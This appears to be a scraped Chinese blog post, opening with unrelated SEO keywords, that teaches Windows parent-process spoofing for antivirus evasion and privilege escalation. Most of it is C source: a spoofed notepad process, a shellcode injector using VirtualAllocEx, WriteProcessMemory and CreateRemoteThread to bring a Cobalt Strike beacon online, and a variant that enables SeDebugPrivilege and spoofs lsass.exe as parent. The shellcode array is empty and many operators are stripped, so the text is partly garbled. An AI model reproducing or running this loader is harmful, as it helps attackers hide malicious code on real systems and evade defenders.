服装业网站建设的策划,时间轴 wordpress,360网站seo优化怎么做,开发公司与物业公司交接清单文章目录 前记普通权限的父进程欺骗ShllCode上线进程提权基础进程提权注入 前记
父进程欺骗作用#xff1a;
进程链信任免杀进程提权
检测#xff1a;
etw
普通权限的父进程欺骗
#includestdio.h
#includewindows.h
#include TlHelp32.hDWORD … 文章目录 前记普通权限的父进程欺骗ShllCode上线进程提权基础进程提权注入 前记
父进程欺骗作用
进程链信任免杀进程提权
检测
etw
普通权限的父进程欺骗
#includestdio.h
#includewindows.h
#include TlHelp32.hDWORD getpid(LPCTSTR ProcessName)
{HANDLE hProceessnap CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProceessnap INVALID_HANDLE_VALUE){puts(创建进行快照失败\n);return 0;}else{PROCESSENTRY32 pe32;pe32.dwSize sizeof(pe32);BOOL hProcess Process32First(hProceessnap, pe32);while (hProcess){if (_wcsicmp(ProcessName, pe32.szExeFile) 0){printf(pid%d\n, pe32.th32ProcessID);//printf(ppid%d, pe32.th32ParentProcessID);CloseHandle(hProceessnap);return pe32.th32ProcessID;}hProcess Process32Next(hProceessnap, pe32);}}CloseHandle(hProceessnap);return 0;
}
int main()
{//initializationPROCESS_INFORMATION pi { 0 };STARTUPINFOEXA si { 0 };SIZE_T sizeToAllocate;si.StartupInfo.cb sizeof(STARTUPINFOEXA);//getparenthandleDWORD pid getpid(Lx64dbg.exe);HANDLE parentProcessHandle OpenProcess(PROCESS_ALL_ACCESS, false, pid);//UpdateProcThreadAttributeInitializeProcThreadAttributeList(NULL, 1, 0, sizeToAllocate);si.lpAttributeList (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, sizeToAllocate);UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, parentProcessHandle, sizeof(HANDLE), NULL, NULL);//CreateProcessCreateProcessA(NULL, (LPSTR)notepad, NULL, NULL, TRUE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, si.StartupInfo, pi);system(pause);return 0;
}关键api、结构体
CreateProcessA
BOOL CreateProcessA([in, optional] LPCSTR lpApplicationName,[in, out, optional] LPSTR lpCommandLine,[in, optional] LPSECURITY_ATTRIBUTES lpProcessAttributes,[in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes,[in] BOOL bInheritHandles,[in] DWORD dwCreationFlags,[in, optional] LPVOID lpEnvironment,[in, optional] LPCSTR lpCurrentDirectory,[in] LPSTARTUPINFOA lpStartupInfo,[out] LPPROCESS_INFORMATION lpProcessInformation
);PROCESS_INFORMATION
typedef struct _PROCESS_INFORMATION {HANDLE hProcess;HANDLE hThread;DWORD dwProcessId;DWORD dwThreadId;
} PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;STARTUPINFOEXA
typedef struct _STARTUPINFOEXA {STARTUPINFOA StartupInfo;LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
} STARTUPINFOEXA, *LPSTARTUPINFOEXA;HeapAlloc
DECLSPEC_ALLOCATOR LPVOID HeapAlloc([in] HANDLE hHeap,[in] DWORD dwFlags,[in] SIZE_T dwBytes
);UpdateProcThreadAttribute
BOOL UpdateProcThreadAttribute([in, out] LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList,[in] DWORD dwFlags,[in] DWORD_PTR Attribute,[in] PVOID lpValue,[in] SIZE_T cbSize,[out, optional] PVOID lpPreviousValue,[in, optional] PSIZE_T lpReturnSize
);PROC_THREAD_ATTRIBUTE_PARENT_PROCESS lpValue 参数是指向要使用的进程的句柄的指针而不是作为所创建进程的父进程的调用进程。 要使用的进程必须具有 PROCESS_CREATE_PROCESS 访问权限。
从指定进程继承的属性包括句柄、设备映射、处理器相关性、优先级、配额、进程令牌和作业对象。 (请注意某些属性如调试端口将来自创建过程而不是此 handle.)
QueueUserAPC
DWORD QueueUserAPC([in] PAPCFUNC pfnAPC,[in] HANDLE hThread,[in] ULONG_PTR dwData
);ShllCode上线
#includestdio.h
#includewindows.h
#include TlHelp32.hDWORD getpid(LPCTSTR ProcessName)
{HANDLE hProceessnap CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProceessnap INVALID_HANDLE_VALUE){puts(创建进行快照失败\n);return 0;}else{PROCESSENTRY32 pe32;pe32.dwSize sizeof(pe32);BOOL hProcess Process32First(hProceessnap, pe32);while (hProcess){if (_wcsicmp(ProcessName, pe32.szExeFile) 0){printf(pid%d\n, pe32.th32ProcessID);//printf(ppid%d, pe32.th32ParentProcessID);CloseHandle(hProceessnap);return pe32.th32ProcessID;}hProcess Process32Next(hProceessnap, pe32);}}CloseHandle(hProceessnap);return 0;
}
int main()
{//initializationPROCESS_INFORMATION pi { 0 };STARTUPINFOEXA si { 0 };SIZE_T sizeToAllocate;si.StartupInfo.cb sizeof(STARTUPINFOEXA);//getparenthandleDWORD pid getpid(Lx64dbg.exe);HANDLE parentProcessHandle OpenProcess(PROCESS_ALL_ACCESS, false, pid);//UpdateProcThreadAttributeInitializeProcThreadAttributeList(NULL, 1, 0, sizeToAllocate);si.lpAttributeList (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, sizeToAllocate);UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, parentProcessHandle, sizeof(HANDLE), NULL, NULL);//CreateProcessunsigned char shellcode[] ;CreateProcessA(NULL, (LPSTR)notepad, NULL, NULL, TRUE,CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, si.StartupInfo, pi);LPVOID lpBaseAddress (LPVOID)VirtualAllocEx(pi.hProcess, NULL, 0x2000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, NULL);CloseHandle(pi.hThread);return 0;
}这里cs以notepad进程的分线程上线当notepad被关闭时cs会被下线 进程提权基础
流程
1.打开进程访问令牌 2.取得特权的LUID值 3.调整访问令牌特权值
使用api,结构体
OpenProcessToken
BOOL OpenProcessToken([in] HANDLE ProcessHandle,[in] DWORD DesiredAccess,[out] PHANDLE TokenHandle
);LookupPrivilegeValue
BOOL LookupPrivilegeValueA([in, optional] LPCSTR lpSystemName,[in] LPCSTR lpName,[out] PLUID lpLuid
);AdjustTokenPrivileges
BOOL AdjustTokenPrivileges([in] HANDLE TokenHandle,[in] BOOL DisableAllPrivileges,[in, optional] PTOKEN_PRIVILEGES NewState,[in] DWORD BufferLength,[out, optional] PTOKEN_PRIVILEGES PreviousState,[out, optional] PDWORD ReturnLength
);TOKEN_PRIVILEGES
typedef struct _TOKEN_PRIVILEGES {DWORD PrivilegeCount;LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
} TOKEN_PRIVILEGES, *PTOKEN_PRIVILEGES;LUID_AND_ATTRIBUTES
typedef struct _LUID_AND_ATTRIBUTES {LUID Luid;DWORD Attributes;
} LUID_AND_ATTRIBUTES, *PLUID_AND_ATTRIBUTES;EnableDebugPrivilege代码如下
#include stdio.h
#include windows.h
BOOL EnableDebugPrivilege()
{HANDLE token_handle;LUID luid;TOKEN_PRIVILEGES tkp;//打开访问令牌if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,token_handle)){printf(openProcessToken error);return FALSE;}//查询luidif (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,luid)){CloseHandle(token_handle);printf(lookupPrivilegevalue error);return FALSE;}tkp.PrivilegeCount 1;tkp.Privileges[0].Luid luid;tkp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;//调整访问令牌权限if (!AdjustTokenPrivileges(token_handle,FALSE,tkp,sizeof(tkp),NULL,NULL)){CloseHandle(token_handle);printf(adjust error);return FALSE;}printf(sucessful);return TRUE;
}
int main()
{EnableDebugPrivilege();system(pause);return 0;
}进程提权注入
#include coleak.hBOOL EnableDebugPrivilege()
{HANDLE token_handle;LUID luid;TOKEN_PRIVILEGES tkp;//打开访问令牌if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token_handle)){printf(openProcessToken error);return FALSE;}//查询luidif (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, luid)){CloseHandle(token_handle);printf(lookupPrivilegevalue error);return FALSE;}tkp.PrivilegeCount 1;tkp.Privileges[0].Luid luid;tkp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED;//调整访问令牌权限if (!AdjustTokenPrivileges(token_handle, FALSE, tkp, sizeof(tkp), NULL, NULL)){CloseHandle(token_handle);printf(adjust error);return FALSE;}printf(sucessful);return TRUE;
}DWORD getpid(LPCTSTR ProcessName)
{HANDLE hProceessnap CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProceessnap INVALID_HANDLE_VALUE){puts(创建进行快照失败\n);return 0;}else{PROCESSENTRY32 pe32;pe32.dwSize sizeof(pe32);BOOL hProcess Process32First(hProceessnap, pe32);while (hProcess){if (_wcsicmp(ProcessName, pe32.szExeFile) 0){printf(pid%d\n, pe32.th32ProcessID);//printf(ppid%d, pe32.th32ParentProcessID);CloseHandle(hProceessnap);return pe32.th32ProcessID;}hProcess Process32Next(hProceessnap, pe32);}}CloseHandle(hProceessnap);return 0;
}VOID ppidfunc(DWORD pid) {PROCESS_INFORMATION pi { 0 };STARTUPINFOEXA si { 0 };SIZE_T sizeToAllocate;si.StartupInfo.cb sizeof(STARTUPINFOEXA);//getparenthandleHANDLE parentProcessHandle OpenProcess(PROCESS_ALL_ACCESS, false, pid);//UpdateProcThreadAttributeInitializeProcThreadAttributeList(NULL, 1, 0, sizeToAllocate);si.lpAttributeList (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, sizeToAllocate);UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, parentProcessHandle, sizeof(HANDLE), NULL, NULL);//CreateProcessunsigned char shellcode[] ;CreateProcessA(NULL, (LPSTR)notepad, NULL, NULL, TRUE, CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, si.StartupInfo, pi);LPVOID lpBaseAddress (LPVOID)VirtualAllocEx(pi.hProcess, NULL, 0x2000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, NULL);CloseHandle(pi.hThread);CloseHandle(pi.hProcess);CloseHandle(parentProcessHandle);
}int main() {// 进程提权EnableDebugPrivilege();// 找指定进程pidDWORD pid getpid(Llsass.exe);// 父进程欺骗ppidfunc(pid);system(pause);return 0;
}
